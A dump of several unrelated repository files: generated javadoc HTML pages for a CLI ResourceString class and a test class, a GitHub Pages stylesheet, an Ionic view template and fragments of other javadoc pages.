<!-- ========= END OF CLASS DATA ========= -->
<A NAME="navbar_top"></A>
<div id="footer" class="wrap" >
<div id="copyright">
Except as noted, this content is licensed under <a
href="http://www.apache.org/licenses/LICENSE-2.0">Apache 2.0</a>.
For details and restrictions, see the <a href="../../../../../../../../license.html">
Content License</a>.
</div>
<div id="build_info">
Android GmsCore 1250110 r —
<script src="../../../../../../../../timestamp.js" type="text/javascript"></script>
<script>document.write(BUILD_TIMESTAMP)</script>
</div>
<div id="footerlinks">
<p>
<a href="../../../../../../../../about/index.html">About Android</a> |
<a href="../../../../../../../../legal.html">Legal</a> |
<a href="../../../../../../../../support.html">Support</a>
</p>
</div>
</div> <!-- end footer -->
</div> <!-- jd-content -->
</div><!-- end doc-content -->
</div> <!-- end body-content -->
</body>
</html>
|
stylesheets/styles.css | Tracyc3/Tracyc3.github.io | @import url(https://fonts.googleapis.com/css?family=Lato:300italic,700italic,300,700);
body {
padding:50px;
font:14px/1.5 Lato, "Helvetica Neue", Helvetica, Arial, sans-serif;
color:#777;
font-weight:300;
}
h1, h2, h3, h4, h5, h6 {
color:#222;
margin:0 0 20px;
}
p, ul, ol, table, pre, dl {
margin:0 0 20px;
}
h1, h2, h3 {
line-height:1.1;
}
h1 {
font-size:28px;
}
h2 {
color:#393939;
}
h3, h4, h5, h6 {
color:#494949;
}
a {
color:#39c;
font-weight:400;
text-decoration:none;
}
a small {
font-size:11px;
color:#777;
margin-top:-0.6em;
display:block;
}
.wrapper {
width:860px;
margin:0 auto;
}
blockquote {
border-left:1px solid #e5e5e5;
margin:0;
padding:0 0 0 20px;
font-style:italic;
}
code, pre {
font-family:Monaco, Bitstream Vera Sans Mono, Lucida Console, Terminal;
color:#333;
font-size:12px;
}
pre {
padding:8px 15px;
background: #f8f8f8;
border-radius:5px;
border:1px solid #e5e5e5;
overflow-x: auto;
}
table {
width:100%;
border-collapse:collapse;
}
th, td {
text-align:left;
padding:5px 10px;
border-bottom:1px solid #e5e5e5;
}
dt {
color:#444;
font-weight:700;
}
th {
color:#444;
}
img {
max-width:100%;
}
header {
width:270px;
float:left;
position:fixed;
}
header ul {
list-style:none;
height:40px;
padding:0;
background: #eee;
background: -moz-linear-gradient(top, #f8f8f8 0%, #dddddd 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f8f8f8), color-stop(100%,#dddddd));
background: -webkit-linear-gradient(top, #f8f8f8 0%,#dddddd 100%);
background: -o-linear-gradient(top, #f8f8f8 0%,#dddddd 100%);
background: -ms-linear-gradient(top, #f8f8f8 0%,#dddddd 100%);
background: linear-gradient(top, #f8f8f8 0%,#dddddd 100%);
border-radius:5px;
border:1px solid #d2d2d2;
box-shadow:inset #fff 0 1px 0, inset rgba(0,0,0,0.03) 0 -1px 0;
width:270px;
}
header li {
width:89px;
float:left;
border-right:1px solid #d2d2d2;
height:40px;
}
header ul a {
line-height:1;
font-size:11px;
color:#999;
display:block;
text-align:center;
padding-top:6px;
height:40px;
}
strong {
color:#222;
font-weight:700;
}
header ul li + li {
width:88px;
border-left:1px solid #fff;
}
header ul li + li + li {
border-right:none;
width:89px;
}
header ul a strong {
font-size:14px;
display:block;
color:#222;
}
section {
width:500px;
float:right;
padding-bottom:50px;
}
small {
font-size:11px;
}
hr {
border:0;
background:#e5e5e5;
height:1px;
margin:0 0 20px;
}
footer {
width:270px;
float:left;
position:fixed;
bottom:50px;
}
@media print, screen and (max-width: 960px) {
div.wrapper {
width:auto;
margin:0;
}
header, section, footer {
float:none;
position:static;
width:auto;
}
header {
padding-right:320px;
}
section {
border:1px solid #e5e5e5;
border-width:1px 0;
padding:20px 0;
margin:0 0 20px;
}
header a small {
display:inline;
}
header ul {
position:absolute;
right:50px;
top:52px;
}
}
@media print, screen and (max-width: 720px) {
body {
word-wrap:break-word;
}
header {
padding:0;
}
header ul, header p.view {
position:static;
}
pre, code {
word-wrap:normal;
}
}
@media print, screen and (max-width: 480px) {
body {
padding:15px;
}
header ul {
display:none;
}
}
@media print {
body {
padding:0.4in;
font-size:12pt;
color:#444;
}
}
nav{
float:right;
} |
templates/tab-dentidad.html | DrJosepon/ratasas | <ion-view view-title="DEtnidad">
<ion-nav-title>
Entidad
</ion-nav-title>
<ion-content>
<ion-list>
<ul id="DEntidad" class="list" ></ul>
<div id="cargaDEntidad">
Loading...
</div>
</ion-list>
</ion-content>
</ion-view>
|
zfsd/control/cli/lib/cli-2.7/web/javadoc/html/cli/ResourceString.html | snua12/zlomekfs | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_03) on Mon Dec 12 23:21:03 CET 2011 -->
<TITLE>
ResourceString
</TITLE>
<META NAME="keywords" CONTENT="cli.ResourceString class">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="ResourceString";
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-20981143-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../cli/ParamString.html" title="class in cli"><B>PREV CLASS</B></A>
<A HREF="../cli/Shell.html" title="class in cli"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../index.html?cli/ResourceString.html" target="_top"><B>FRAMES</B></A>
<A HREF="ResourceString.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
cli</FONT>
<BR>
Class ResourceString</H2>
<PRE>
java.lang.Object
<IMG SRC="../resources/inherit.gif" ALT="extended by "><A HREF="../cli/NativeObject.html" title="class in cli">cli.NativeObject</A>
<IMG SRC="../resources/inherit.gif" ALT="extended by "><B>cli.ResourceString</B>
</PRE>
<DL>
<DT><B>Direct Known Subclasses:</B> <DD><A HREF="../cli/Help.html" title="class in cli">Help</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public class <B>ResourceString</B><DT>extends <A HREF="../cli/NativeObject.html" title="class in cli">NativeObject</A></DL>
</PRE>
<P>
Resource string class.
<P>
<P>
<HR>
<P>
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Field Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#LANG_COUNT">LANG_COUNT</A></B></CODE>
<BR>
Number of languages managed by the library.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#LANG_EN">LANG_EN</A></B></CODE>
<BR>
English language constant.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#LANG_FR">LANG_FR</A></B></CODE>
<BR>
French language constant.</TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> </CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#ResourceString()">ResourceString</A></B>()</CODE>
<BR>
Default constructor.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>protected </CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#ResourceString(int)">ResourceString</A></B>(int I_NativeStringRef)</CODE>
<BR>
Constructor for createFromNative() or child classes only.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> </CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#ResourceString(cli.ResourceString)">ResourceString</A></B>(<A HREF="../cli/ResourceString.html" title="class in cli">ResourceString</A> CLI_String)</CODE>
<BR>
Copy constructor.</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>protected static void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#createFromNative(int)">createFromNative</A></B>(int I_NativeStringRef)</CODE>
<BR>
Creation from native code.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>protected static void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#deleteFromNative(int)">deleteFromNative</A></B>(int I_NativeStringRef)</CODE>
<BR>
Destruction from native code.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>protected void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#finalize()">finalize</A></B>()</CODE>
<BR>
Destructor.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#getString(int)">getString</A></B>(int E_Lang)</CODE>
<BR>
Retrieves the string attached for the given language.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> boolean</CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#hasString(int)">hasString</A></B>(int E_Lang)</CODE>
<BR>
States whether the resource string object has a resource for the given language.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../cli/ResourceString.html" title="class in cli">ResourceString</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../cli/ResourceString.html#setString(int, java.lang.String)">setString</A></B>(int E_Lang,
java.lang.String J_String)</CODE>
<BR>
String addition for a given language.</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_cli.NativeObject"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class cli.<A HREF="../cli/NativeObject.html" title="class in cli">NativeObject</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../cli/NativeObject.html#createdFromNative(cli.NativeObject)">createdFromNative</A>, <A HREF="../cli/NativeObject.html#deletedFromNative(cli.NativeObject)">deletedFromNative</A>, <A HREF="../cli/NativeObject.html#dontFinalize()">dontFinalize</A>, <A HREF="../cli/NativeObject.html#forget(cli.NativeObject)">forget</A>, <A HREF="../cli/NativeObject.html#getbDoFinalize()">getbDoFinalize</A>, <A HREF="../cli/NativeObject.html#getNativeRef()">getNativeRef</A>, <A HREF="../cli/NativeObject.html#getObject(int)">getObject</A>, <A HREF="../cli/NativeObject.html#remember(cli.NativeObject)">remember</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>clone, equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Field Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="LANG_EN"><!-- --></A><H3>
LANG_EN</H3>
<PRE>
public static final int <B>LANG_EN</B></PRE>
<DL>
<DD>English language constant.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../constant-values.html#cli.ResourceString.LANG_EN">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="LANG_FR"><!-- --></A><H3>
LANG_FR</H3>
<PRE>
public static final int <B>LANG_FR</B></PRE>
<DL>
<DD>French language constant.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../constant-values.html#cli.ResourceString.LANG_FR">Constant Field Values</A></DL>
</DL>
<HR>
<A NAME="LANG_COUNT"><!-- --></A><H3>
LANG_COUNT</H3>
<PRE>
public static final int <B>LANG_COUNT</B></PRE>
<DL>
<DD>Number of languages managed by the library.
<P>
<DL>
<DT><B>See Also:</B><DD><A HREF="../constant-values.html#cli.ResourceString.LANG_COUNT">Constant Field Values</A></DL>
</DL>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="ResourceString()"><!-- --></A><H3>
ResourceString</H3>
<PRE>
public <B>ResourceString</B>()</PRE>
<DL>
<DD>Default constructor.
<P>
</DL>
<HR>
<A NAME="ResourceString(cli.ResourceString)"><!-- --></A><H3>
ResourceString</H3>
<PRE>
public <B>ResourceString</B>(<A HREF="../cli/ResourceString.html" title="class in cli">ResourceString</A> CLI_String)</PRE>
<DL>
<DD>Copy constructor.
<P>
<DL>
<DT><B>Parameters:</B><DD><CODE>CLI_String</CODE> - Source object.</DL>
</DL>
<HR>
<A NAME="ResourceString(int)"><!-- --></A><H3>
ResourceString</H3>
<PRE>
protected <B>ResourceString</B>(int I_NativeStringRef)</PRE>
<DL>
<DD>Constructor for createFromNative() or child classes only.
<P>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="createFromNative(int)"><!-- --></A><H3>
createFromNative</H3>
<PRE>
protected static void <B>createFromNative</B>(int I_NativeStringRef)</PRE>
<DL>
<DD>Creation from native code.
Useful for help members of other classes.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>I_NativeStringRef</CODE> - Native instance reference.</DL>
</DD>
</DL>
<HR>
<A NAME="finalize()"><!-- --></A><H3>
finalize</H3>
<PRE>
protected void <B>finalize</B>()
throws java.lang.Throwable</PRE>
<DL>
<DD>Destructor.
<P>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE><A HREF="../cli/NativeObject.html#finalize()">finalize</A></CODE> in class <CODE><A HREF="../cli/NativeObject.html" title="class in cli">NativeObject</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Throws:</B>
<DD><CODE>java.lang.Throwable</CODE></DL>
</DD>
</DL>
<HR>
<A NAME="deleteFromNative(int)"><!-- --></A><H3>
deleteFromNative</H3>
<PRE>
protected static void <B>deleteFromNative</B>(int I_NativeStringRef)</PRE>
<DL>
<DD>Destruction from native code.
See createFromNative().
<P>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="setString(int, java.lang.String)"><!-- --></A><H3>
setString</H3>
<PRE>
public final <A HREF="../cli/ResourceString.html" title="class in cli">ResourceString</A> <B>setString</B>(int E_Lang,
java.lang.String J_String)</PRE>
<DL>
<DD>String addition for a given language.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>E_Lang</CODE> - Language identifier (LANG_EN, LANG_FR...)<DD><CODE>J_String</CODE> - String of the given language.
<DT><B>Returns:</B><DD>The resource string instance itself.</DL>
</DD>
</DL>
<HR>
<A NAME="hasString(int)"><!-- --></A><H3>
hasString</H3>
<PRE>
public final boolean <B>hasString</B>(int E_Lang)</PRE>
<DL>
<DD>States whether the resource string object has a resource for the given language.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>E_Lang</CODE> - Language identifier (LANG_EN, LANG_FR...)
<DT><B>Returns:</B><DD>true if the resource string object contains resource for the given language, false otherwise.</DL>
</DD>
</DL>
<HR>
<A NAME="getString(int)"><!-- --></A><H3>
getString</H3>
<PRE>
public final java.lang.String <B>getString</B>(int E_Lang)</PRE>
<DL>
<DD>Retrieves the string attached for the given language.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>E_Lang</CODE> - Language identifier (LANG_EN, LANG_FR...)
<DT><B>Returns:</B><DD>String.</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../cli/ParamString.html" title="class in cli"><B>PREV CLASS</B></A>
<A HREF="../cli/Shell.html" title="class in cli"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../index.html?cli/ResourceString.html" target="_top"><B>FRAMES</B></A>
<A HREF="ResourceString.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
doc/jedi/tests/unittests/class-use/PublisherTest.html | pydawan/jedi-orm-2 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="pt">
<head>
<!-- Generated by javadoc (1.8.0_05) on Wed Sep 03 18:08:43 BRT 2014 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class jedi.tests.unittests.PublisherTest</title>
<meta name="date" content="2014-09-03">
<link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class jedi.tests.unittests.PublisherTest";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../jedi/tests/unittests/PublisherTest.html" title="class in jedi.tests.unittests">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?jedi/tests/unittests/class-use/PublisherTest.html" target="_top">Frames</a></li>
<li><a href="PublisherTest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class jedi.tests.unittests.PublisherTest" class="title">Uses of Class<br>jedi.tests.unittests.PublisherTest</h2>
</div>
<div class="classUseContainer">No usage of jedi.tests.unittests.PublisherTest</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../jedi/tests/unittests/PublisherTest.html" title="class in jedi.tests.unittests">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../index-files/index-1.html">Index</a></li>
<li><a href="../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../index.html?jedi/tests/unittests/class-use/PublisherTest.html" target="_top">Frames</a></li>
<li><a href="PublisherTest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
sites/all/libraries/mahout/docs/mahout-utils/org/apache/mahout/utils/vectors/arff/package-tree.html | front/commerce | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_24) on Sat May 28 14:11:57 BST 2011 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
org.apache.mahout.utils.vectors.arff Class Hierarchy (Mahout Utilities 0.5 API)
</TITLE>
<META NAME="date" CONTENT="2011-05-28">
